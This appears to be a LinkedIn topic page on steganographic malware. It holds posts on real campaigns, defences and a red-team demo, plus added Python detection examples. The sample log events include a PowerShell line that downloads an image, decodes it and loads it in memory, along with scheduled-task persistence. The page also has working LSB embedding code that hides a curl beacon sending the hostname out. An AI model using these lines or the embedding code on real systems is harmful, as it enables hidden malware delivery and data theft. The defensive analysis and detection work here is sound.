Steganography in Cybersecurity


Summary

Steganography in cybersecurity is the practice of hiding malicious code or sensitive information inside everyday digital files, such as images, audio, or text, so that the carrier passes filters that only inspect file type and surface content. Attackers use it to deliver later-stage malware (the posts below describe payloads fetched from image-hosting sites and unpacked by PowerShell) or to exfiltrate data without drawing attention, which makes detection especially challenging for traditional signature-based tools.

  • Strengthen email security: Encourage your team to be cautious with unexpected attachments and configure mail filters to block or sandbox scripts and archives from unknown senders.
  • Monitor unusual file behavior: Keep an eye out for unusually large images, bytes appended after an image's end-of-file marker, and PowerShell that downloads images, decodes Base64, or loads .NET assemblies from memory; these are the signs of steganography-based delivery described in the posts below.
  • Deploy advanced detection tools: Use endpoint security with behavioural detection that can spot in-memory execution and scheduled-task persistence, and analyze files for concealed payloads, beyond basic antivirus scans.
Summarized by AI based on LinkedIn member posts
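The summary's advice to "analyze files for concealed payloads" is easier to act on with a concrete check. The following Python is an added example, not code from any of the posts on this page: it parses a PNG's chunk structure, flags bytes appended after the IEND chunk (the cheapest place to stash an encoded stage-2 blob) and oversized ancillary chunks, and looks for Base64-shaped runs in the suspect region. The test image, the `<<BASE64_START>>`/`<<BASE64_END>>` markers and the 4 KiB ancillary-chunk threshold are constructed assumptions, so the script runs offline without a real sample.

```python
"""Added example: PNG structure check for appended/oversized payload regions.
The sample image and markers below are constructed, not taken from a campaign."""
import base64
import re
import struct
import zlib

PNG_SIG = b"\x89PNG\r\n\x1a\n"
B64_RUN = re.compile(rb"[A-Za-z0-9+/]{64,}={0,2}")   # long Base64-looking run
LARGE_ANCILLARY = 4096                                 # assumed threshold, tune locally


def parse_chunks(data: bytes):
    """Return ([(type, length, offset), ...], trailing bytes after IEND)."""
    if not data.startswith(PNG_SIG):
        raise ValueError("not a PNG")
    pos = len(PNG_SIG)
    chunks = []
    while pos + 8 <= len(data):
        length, ctype = struct.unpack(">I4s", data[pos:pos + 8])
        chunks.append((ctype.decode("latin-1"), length, pos))
        pos += 12 + length            # 4 length + 4 type + data + 4 CRC
        if ctype == b"IEND":
            break
    return chunks, data[pos:]


def inspect_png(data: bytes) -> dict:
    """Summarise chunk layout and list anything worth a closer look."""
    chunks, trailer = parse_chunks(data)
    findings = []
    if trailer:
        findings.append(f"{len(trailer)} bytes after IEND")
        if B64_RUN.search(trailer):
            findings.append("Base64-like run in trailer")
    for ctype, length, _ in chunks:
        # ancillary chunk types start with a lowercase letter; big ones are odd
        if ctype[0].islower() and length > LARGE_ANCILLARY:
            findings.append(f"large ancillary chunk {ctype} ({length} bytes)")
    return {"chunks": [c[0] for c in chunks],
            "trailer_len": len(trailer),
            "findings": findings}


def build_png(width: int = 4, height: int = 4) -> bytes:
    """Construct a minimal valid 8-bit RGB PNG (a constructed sample cover)."""
    def chunk(ctype: bytes, body: bytes) -> bytes:
        crc = zlib.crc32(ctype + body) & 0xFFFFFFFF
        return struct.pack(">I", len(body)) + ctype + body + struct.pack(">I", crc)

    rows = []
    for y in range(height):
        # filter byte 0 followed by width RGB triples
        rows.append(b"\x00" + b"".join(
            bytes(((x * 60) & 0xFF, (y * 60) & 0xFF, 128)) for x in range(width)))
    ihdr = struct.pack(">IIBBBBB", width, height, 8, 2, 0, 0, 0)
    return (PNG_SIG + chunk(b"IHDR", ihdr)
            + chunk(b"IDAT", zlib.compress(b"".join(rows)))
            + chunk(b"IEND", b""))


def suspicious_sample() -> bytes:
    """Clean PNG with a marker-delimited Base64 blob appended after IEND."""
    blob = base64.b64encode(b"A" * 200)    # stand-in for an encoded stage-2 payload
    return build_png() + b"<<BASE64_START>>" + blob + b"<<BASE64_END>>"


if __name__ == "__main__":
    print(inspect_png(build_png()))
    print(inspect_png(suspicious_sample()))
```

A viewer renders both files identically, because decoders stop at IEND; that is exactly why a hunt should compare file size against what the declared dimensions and IDAT data justify, and why a trailer with Base64 structure is worth pulling for decoding.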
  • Johann Savio Pimenta

    Senior Consultant - Information Security Specialist | IT Governance, Risk and Compliance | Cloud Governance & Compliance | Cloud Risk & Audit | CISA | CRISC | CISM | Microsoft Azure Certified

    Did you know cybercriminals can hide malware in plain sight, within seemingly innocent images hosted on platforms like Imgur or Imgbox? Steganographic malware attacks are a growing cyber threat. Here's how they work:

    1. The attacker sends a phishing email containing an Excel file with a malicious VBA script.
    2. Once opened, the script executes a PowerShell command to download images from hosting services.
    3. These images contain encrypted payloads, extracted using steganography techniques like Base64 decoding and AES decryption.
    4. The final payload is executed, compromising the victim's system.

    How to Protect Against It:
    - Train employees to recognize phishing emails and avoid opening suspicious attachments.
    - Use advanced email filters to block malicious attachments.
    - Deploy endpoint detection and response (EDR) tools to monitor suspicious scripts like PowerShell.
    - Regularly patch systems and software to close vulnerabilities.
    - Implement strict access controls and network segmentation to limit damage from an attack.

    What additional measures can organizations take to combat such covert threats? #CyberSecurity #Steganography #Malware #Phishing #ThreatDetection #InfoSec #DataProtection #CyberThreats

  • Olakanmi Oluwole

    SOC Manager and Cyber Threat Intelligence Operations (Africa)

    We are observing widespread and sophisticated fileless malware campaigns targeting companies in the African finance and telecommunications sectors. The campaign typically begins with a phishing email sent to departments such as Sales and Procurement, often disguised as a Request for Quotation (RFQ). The email includes an attachment, commonly a PowerShell (.ps1) dropper file crafted to appear legitimate.

    In one notable case, the dropper, once executed, downloaded what appeared to be a random image file onto the user's system. At first glance, the image seemed harmless, but its huge file size raised suspicion. Further analysis revealed the file contained a malicious DLL hidden using steganography. The attackers concealed binary malware within the image file. The dropper extracted this hidden payload and executed it in memory. It also created a scheduled task via Windows Task Scheduler, ensuring persistence even after reboot. The DLL was executed using in-memory .NET assemblies and PowerShell one-liners, avoiding detection by traditional antivirus solutions. Once active, the payload could accept commands from a remote C2 server, launch processes, and exfiltrate sensitive system information. The malware was observed collecting public and private IP addresses, geolocation data, a list of scheduled tasks, and basic system metadata (useful for lateral movement or persistence).

    These behaviours are consistent with advanced fileless malware operations, where attackers minimise their on-disk footprint and rely on living-off-the-land techniques (LOLBins) to evade detection. Indicators of compromise (IoCs) revealed that the email sender, domain, and IPs have previously been reported in malicious activity, including spoofing, credential harvesting, spam, and phishing. This suggests the threat actors are leveraging an established, actively maintained infrastructure.

    Recommendations for Security Teams
    - Train employees to recognise phishing tactics such as urgency-driven language, unexpected RFQs, and suspicious attachments. Encourage reporting to IT/security teams.
    - Configure filtering policies to block or sandbox compressed file types (e.g., .zip, .rar, .tgz) and scripts (.ps1, .js, .vbs) from untrusted senders.
    - Enable DMARC, SPF, and DKIM enforcement for email to avoid spoofing and spam.
    - Deploy advanced EDR solutions with behavioural detection to catch in-memory execution, PowerShell abuse, and steganographic payloads.
    - Monitor for suspicious persistence mechanisms (e.g., unexpected scheduled tasks).
    - Regularly apply security patches to operating systems, browsers, and office applications.
    - Restrict execution of unsigned PowerShell scripts via Constrained Language Mode or AppLocker/Defender Application Control.
    - Monitor outbound connections to detect C2 traffic patterns.
    - Hunt for anomalous large image files or unusual PowerShell activity in logs.

    #SOC #ThreatIntelligence #DigitalForensics #Malware #FilelessMalware #Threat
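The last recommendation above, hunting for large image files and unusual PowerShell activity in logs, is the one that turns this write-up into a detection. The Python below is an added example and not the author's code: it runs a handful of rules over constructed PowerShell script-block events and file-create events that mirror the chain described (image download, Base64 decode, reflective assembly load, scheduled-task persistence, oversized image on disk) and groups hits per host. The event shape, hostnames, paths, the `example.invalid` URL, the 1 MiB image threshold and the two-rule minimum are all assumptions to be tuned against real telemetry.

```python
"""Added example: rule-based triage of PowerShell script blocks and file events
for the image-download / in-memory-load pattern. All events are constructed."""
import re
from collections import defaultdict

# Patterns drawn from the chain in the post; they are starting points, not
# a signature set, and each should be tuned against local baselines.
RULES = {
    "image_download": re.compile(
        r"\b(DownloadData|DownloadString|DownloadFile|Invoke-WebRequest|iwr)\b"
        r".*\.(png|jpe?g|gif|bmp)\b", re.I),
    "base64_decode": re.compile(r"FromBase64String", re.I),
    "reflective_load": re.compile(r"\[(System\.)?Reflection\.Assembly\]::Load\b", re.I),
    "encoded_command": re.compile(r"-(e|ec|enc|encodedcommand)\s", re.I),
    "sched_task": re.compile(
        r"(schtasks(\.exe)?\s+/create|Register-ScheduledTask|New-ScheduledTask)", re.I),
}
IMAGE_EXT = (".png", ".jpg", ".jpeg", ".gif", ".bmp")
LARGE_IMAGE_BYTES = 1 * 1024 * 1024     # assumed: images above 1 MiB get a look

# Constructed sample telemetry (not real logs): PowerShell script-block text
# (what Event ID 4104 would carry) and file-create events, normalised to dicts.
SAMPLE_EVENTS = [
    {"host": "FIN-WS-07", "type": "ps_scriptblock",
     "script": "$b=(New-Object Net.WebClient).DownloadData('https://img.example.invalid/banner.png');"
               "$s=[Text.Encoding]::UTF8.GetString($b);$i=$s.IndexOf('<<BASE64_START>>')+16;"
               "$a=[Convert]::FromBase64String($s.Substring($i));"
               "[Reflection.Assembly]::Load($a).EntryPoint.Invoke($null,$null)"},
    {"host": "FIN-WS-07", "type": "file_create",
     "path": r"C:\Users\sales\AppData\Local\Temp\banner.png", "size": 5_300_000},
    {"host": "FIN-WS-07", "type": "ps_scriptblock",
     # the -enc blob is a placeholder string, not a real encoded command
     "script": "schtasks /create /tn OneDriveSync /tr 'powershell -w hidden "
               "-enc SQBFAFgAIAAuAC4ALgA=' /sc onlogon /f"},
    {"host": "HR-WS-02", "type": "ps_scriptblock",
     "script": r"Get-ChildItem C:\Reports -Filter *.png | Measure-Object"},
    {"host": "HR-WS-02", "type": "file_create",
     "path": r"C:\Users\hr\Pictures\team.jpg", "size": 48_000},
]


def score_script(script: str) -> list:
    """Names of the rules one script block matches, in RULES order."""
    return [name for name, rx in RULES.items() if rx.search(script)]


def triage(events, min_hits: int = 2) -> dict:
    """Group findings per host; a script block must hit min_hits rules to count,
    a file-create event counts when it is an image at or above the size threshold."""
    findings = defaultdict(list)
    for ev in events:
        if ev["type"] == "ps_scriptblock":
            hits = score_script(ev["script"])
            if len(hits) >= min_hits:
                findings[ev["host"]].append(("powershell", hits))
        elif ev["type"] == "file_create":
            if ev["path"].lower().endswith(IMAGE_EXT) and ev["size"] >= LARGE_IMAGE_BYTES:
                findings[ev["host"]].append(("large_image", [ev["path"], ev["size"]]))
    return dict(findings)


if __name__ == "__main__":
    for host, items in triage(SAMPLE_EVENTS).items():
        for kind, detail in items:
            print(f"{host}: {kind} -> {detail}")
```

Requiring two rules per script block keeps a lone `-enc` or a lone image download from paging anyone, while the combination the post describes (download, decode, reflective load) scores three on its own; the large-image hit on the same host is the corroboration to chase first.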

  • Baris Dincer

    Coder | AI/ML Engineer | Advanced Technology Advisor | Cyber Threat Intelligence & Intelligence-Oriented Security Researcher | CISO @ DISUMTEC SOLUTIONS

    Live usage example of steganography in Red Team operations. Steganography is a method grounded in science, used by attackers or researchers to secretly transmit information by hiding data in digital files (images, audio, or video). In the context of Red Team operations, steganography can be a powerful tool for testing and simulating real-world threats; it also helps evaluate how well a target organization can detect hidden, embedded threats.

    Our example will be quite striking. One of the most compelling examples of this is hiding commands or scripts within image files. These hidden scripts activate when the image is viewed or processed. Once executed, these commands can retrieve critical information or establish a foothold within the target's system. In our example, we embedded a request command among pixel values. I simulated a scenario in which an image containing a malicious payload is sent to the target. When the image is opened, it triggers a command to send the target's IP address and location to a tracking server on my localhost via a simple curl request. A standard PNG file now functions as spyware. The hidden script reveals the target's IP address and other metadata by sending a curl request to our server.

    This method demonstrates how complex attacks can be, as traditional security tools do not typically scan images for embedded code. Even though advanced EDRs have fluid mechanisms in place, additional methods can still provide escape mechanisms. All you need to do is transfer this PNG file with the embedded code to the target system, and how you will infiltrate the decoder into the system is up to your imagination. This is how you can turn a digital image into a tool that can manipulate a target using steganography. Of course, this method can also be used to bypass internet censorship and transfer information. Imagine embedding a text file that you don't want anyone to read into an image and giving the target the pixel range to break it.

    Be cautious with the images you open, my friends. Enjoy! ^-^ #freedomofinternet #cybersecurity #informationsecurity #dataprivacy #privacy #threatintelligence #threathunting

  • Giridaran E (Ethical Hacker)

    Founder & CEO of Cryptosecurity | Protecting Celebrities & High-Profile Individuals from Digital Threats | Certified Ethical Hacker

    🛡️ Cybersecurity Alert: Steganography-based Malware Campaign 📢 Excited to share insights into a recent cybersecurity threat discovered by Positive Technologies. Dubbed "SteganoAmor," this campaign orchestrated by threat actor TA558 has raised significant concerns across industries.

    🛑 Threat Overview: TA558 has been employing steganography, a technique of concealing malicious payloads within innocuous files, to distribute a slew of malware including Agent Tesla, FormBook, Remcos RAT, LokiBot, GuLoader, Snake Keylogger, and XWorm.

    🔍 Modus Operandi: The group embeds VBSs, PowerShell code, and RTF documents with exploits inside images and text files, camouflaging them as innocent attachments like "greatloverstory.vbs" and "easytolove.vbs."

    🎯 Targeted Sectors: While primarily aimed at industrial, services, public, electric power, and construction sectors in Latin America, companies in Russia, Romania, and Turkey have also fallen victim.

    🔥 Phishing Vector: Recently, TA558 has been deploying Venom RAT via phishing emails targeting enterprises across Spain, Mexico, the United States, Colombia, Portugal, Brazil, Dominican Republic, and Argentina.

    🚨 Malware Delivery Chain: The attack typically starts with a phishing email containing a booby-trapped Microsoft Excel attachment exploiting CVE-2017-11882 to download malicious payloads from paste[.]ee.

    🛡️ Countermeasures: Organizations are urged to reinforce email security measures, patch vulnerabilities promptly, and enhance employee awareness to thwart such attacks.

    🔗 Connections to Other Threat Groups: Notably, there are potential links to another hacking group named YoroTrooper (aka SturgeonPhisher), as indicated by victim geography and malware artifacts.

    🔒 Stay Vigilant: In the face of evolving cyber threats, continuous monitoring, robust defenses, and proactive measures are imperative to safeguard sensitive data and critical infrastructure. Let's stay vigilant and resilient against cyber adversaries.

    Your cybersecurity is our priority! #Cybersecurity #Steganography #MalwareThreat #PhishingAttacks #StaySafeOnline

  • Thomas Le Coz

    Social engineering attack simulations: connect to our solutions to audit, test and improve the cybersecurity human layer — CEO @ Arsen

    A 2MB PNG file hid malware, delivered through a Teams vishing attack. At a recent AISI - Expert Cybersécurité, Infrastructure & Gouvernance talk, they shared an incident response case that stood out. The attacker:

    1/ Used Microsoft Teams for a vishing call
    2/ Convinced the target to download a file (part of the pretext; this also works with ClickFix attacks)
    3/ Hid the malware inside a 2MB PNG using steganography.

    Result? The payload sat on disk while scanners looked the other way. This isn't brand new, but it's unusual. And dangerous. Why? Because it blends the familiar (Teams calls, PNG files) with a technique that most defenses aren't tuned to catch. Attackers don't need to invent something radical. They just need to combine what works in unexpected ways.

    Great talk Maminiaina RABAKOSON! (Image source: ANY.RUN on PDF Steganography)

  • Jean-Pierre Lesueur

    Security and Malware Researcher - Microsoft MVP

    🌟 Pleased to announce the release of the second part of my Understanding Malware Patching series! This time, we talk about Application Resources as a malicious vector. The lengthy article is accompanied by a bonus project that demonstrates how a threat actor could leverage genuine Bitmap files to store malicious shellcode. This is achieved through an easy-to-understand steganography technique, encoding the shellcode into bitmap pixels for retrieval and execution. https://lnkd.in/ehH7Cvmw #InfoSec #OffSec #Malware #Microsoft #Windows #DFIR
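Both this post and Baris Dincer's above rely on the same primitive: spreading payload bytes across pixel values so that the carrier still renders normally. The Python below is an added example, not code from either author's project: it embeds a length-prefixed payload (a command string here, shellcode bytes work identically) into the least-significant bit of consecutive channel bytes of a raw RGB buffer, extracts it back, and includes the plausibility check an analyst would run before trusting a decoded length. The cover image is a constructed gradient rather than a real file, and the 4-byte big-endian length header is an assumed framing; a real tool would read and write the pixels through an image library.

```python
"""Added example: LSB steganography over a raw RGB pixel buffer.
Cover image, payload and framing are constructed for the demonstration."""
import struct

IMG_W, IMG_H = 64, 64


def make_cover(width: int = IMG_W, height: int = IMG_H) -> bytearray:
    """Constructed RGB cover with a mixed LSB plane (a real carrier would be
    decoded from an image file)."""
    buf = bytearray()
    for y in range(height):
        for x in range(width):
            buf += bytes(((x * 7) & 0xFF, (y * 13) & 0xFF, (x * y + 3) & 0xFF))
    return buf


def _payload_bits(data: bytes):
    """Yield the bits of data, most significant bit of each byte first."""
    for byte in data:
        for shift in range(7, -1, -1):
            yield (byte >> shift) & 1


def embed(cover: bytes, payload: bytes) -> bytearray:
    """Write a 4-byte length header plus payload into the LSB of each channel
    byte in order; every other bit of the image is left untouched."""
    framed = struct.pack(">I", len(payload)) + payload
    if len(framed) * 8 > len(cover):
        raise ValueError("payload too large for this cover")
    stego = bytearray(cover)
    for i, bit in enumerate(_payload_bits(framed)):
        stego[i] = (stego[i] & 0xFE) | bit
    return stego


def _read_lsb_bytes(buf: bytes, start_byte: int, count: int) -> bytes:
    """Reassemble count bytes from the LSBs starting at channel byte start_byte."""
    out = bytearray()
    for b in range(count):
        value = 0
        for k in range(8):
            value = (value << 1) | (buf[start_byte + b * 8 + k] & 1)
        out.append(value)
    return bytes(out)


def payload_length(stego: bytes) -> int:
    """Length field as the decoder would read it, plausible or not."""
    return struct.unpack(">I", _read_lsb_bytes(stego, 0, 4))[0]


def looks_like_carrier(stego: bytes) -> bool:
    """A clean image yields a random 32-bit header that almost never fits the
    buffer; a real carrier yields a non-zero length that does."""
    n = payload_length(stego)
    return 0 < n and (n + 4) * 8 <= len(stego)


def extract(stego: bytes) -> bytes:
    if not looks_like_carrier(stego):
        raise ValueError("no plausible LSB length header (clean image or other layout)")
    return _read_lsb_bytes(stego, 32, payload_length(stego))


def max_channel_delta(a: bytes, b: bytes) -> int:
    """Largest per-channel change between two buffers of equal size."""
    return max(abs(x - y) for x, y in zip(a, b))


if __name__ == "__main__":
    cover = make_cover()
    # constructed beacon command; loopback address, not a live server
    cmd = b"curl -s http://127.0.0.1:8000/beacon?h=$(hostname)"
    stego = embed(cover, cmd)
    print(extract(stego))
    print("max channel delta:", max_channel_delta(cover, stego))
```

The maximum per-channel change is 1 out of 255, which is why the carrier looks identical and why size-based hunting (the "huge file size" in the SOC post above) does not catch LSB embedding: the file does not grow. Detecting this class needs statistical tests on the LSB plane or, more practically, catching the decoder that has to run on the host.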

  • Flavio Queiroz, MSc, CISSP, CISM, CRISC, CCISO

    Threat Intelligence · Risk & Crisis Management · GRC · IT/OT · Threat Researcher | GSOC, GCIH, GDSA, GISP, GPEN, GRTP, GCPN, GDAT, GCISP, GCTIA, CTIA, eCMAP, eCTHP, CTMP

    THREAT CAMPAIGN: HOW REMCOS RAT WAS DEPLOYED VIA A WEAPONIZED DOCUMENT AND STEGANOGRAPHY

    ℹ️ The Autoriteti Kombëtar për Sigurinë Kibernetike / National Cyber Security Authority of Albania analyzed a malware campaign leveraging steganography and exploiting CVE-2017-11882, a well-known Microsoft Office vulnerability. This malware campaign primarily targeted infrastructures in Albania through a phishing attack distributing a malicious Word document.

    📍 ATTACK CHAIN
    1. PHISHING EMAIL ◽ A phishing email is sent containing the document Pro+Build_25-020-000009[.]docx.
    2. DOCX OPENED ◽ A hidden command is executed in the background.
    3. DOWNLOADED .DOC ◽ Once the document is opened, it automatically downloads another .doc document from: hxxps[:]//kutt[.]ar-email[.]com[.]br/WYMDyt?&syria
    4. CVE-2017-11882 ◽ The downloaded document exploits CVE-2017-11882 (Microsoft Word Remote Code Execution vulnerability - RCE).
    5. ARBITRARY COMMAND FROM HTA ◽ Arbitrary commands from an HTA file inside the .doc file are executed.
    6. DOWNLOAD GIF ◽ The HTA file downloads a GIF from 74[.]208[.]123[.]191, renames it to .vbs, and saves it in %APPDATA%.
    7. VBS SCRIPT ◽ The VBS script executes and starts PowerShell, which:
       - Downloads image[.]jpg from 67[.]217[.]247[.]193.
       - Uses steganography to extract the payload.
       - Loads the extracted payload using PowerShell Reflection.
    8. "VAI" FUNCTION ◽ The VAI function is invoked from Task Scheduler, executing with string parameters: Remcos Payload encoded[.]txt and Caspol[.]exe.
    9. CASPOL[.]EXE ◽ The Remcos shellcode is injected into Caspol[.]exe.
    10. C&C EXFILTRATION ◽ The Remcos Trojan exfiltrates all sensitive data to the C2 server at 216[.]9[.]225[.]75 (VPS).

    PDF: https://lnkd.in/d6_iCj9K #threathunting #threatdetection #threatanalysis #threatintelligence #cyberthreatintelligence #cyberintelligence #cybersecurity #cyberprotection #cyberdefense

  • CYFIRMA Research

    #externalthreatlandscape #etlm #decodingthreats #cyberintelligence #threatvisibility

    Our latest cyber threat research at CYFIRMA reveals a complex stego-campaign, showcasing a malicious .docx file that's raising serious concerns in the cybersecurity landscape. Our dedicated team unearthed a sophisticated attack chain that employs template injection, effectively bypassing conventional email security measures. The malicious .docx file, distributed possibly through phishing emails, sets off a multi-stage attack upon opening. The attack involves the deployment of the Remcos Remote Access Trojan (RAT) and the notorious Agent Tesla malware, each with its set of malicious functionalities. Notably, the document, seemingly benign on the surface, contains a targeted approach, hinting at a potential focus on Taiwan.

    Our research dives deep into the sophisticated process, unraveling the use of Visual Basic and PowerShell scripts, legitimate binaries like "RegAsm" and "WinRm," and the exploitation of the Equation Editor Vulnerability (CVE-2017-11882). The attack showcases a high level of sophistication, utilizing Living Off the Land Binary (LoLBin) binaries to accomplish malicious objectives. As we consistently monitor emerging threats, our team unveiled similar samples with a common upload date, indicating a coordinated effort rather than random activity. This underlines the possibility of a purposeful campaign orchestrated by threat actors.

    Our commitment at CYFIRMA is to anticipate and scrutinize evolving cyber threats, providing insights to fortify the cybersecurity landscape. The detailed report sheds light on the entire attack chain, emphasizing the need for proactive measures against such advanced threats.

    #CyberThreat #MalwareResearch #StegoCampaign #CyberSecurity #ThreatIntelligence #CyfirmaInsights #Remcos RAT #AgentTesla #Malicious.docx #CyfirmaResearch #Cyfirma #ExternalThreatLandscapeManagement #ETLM
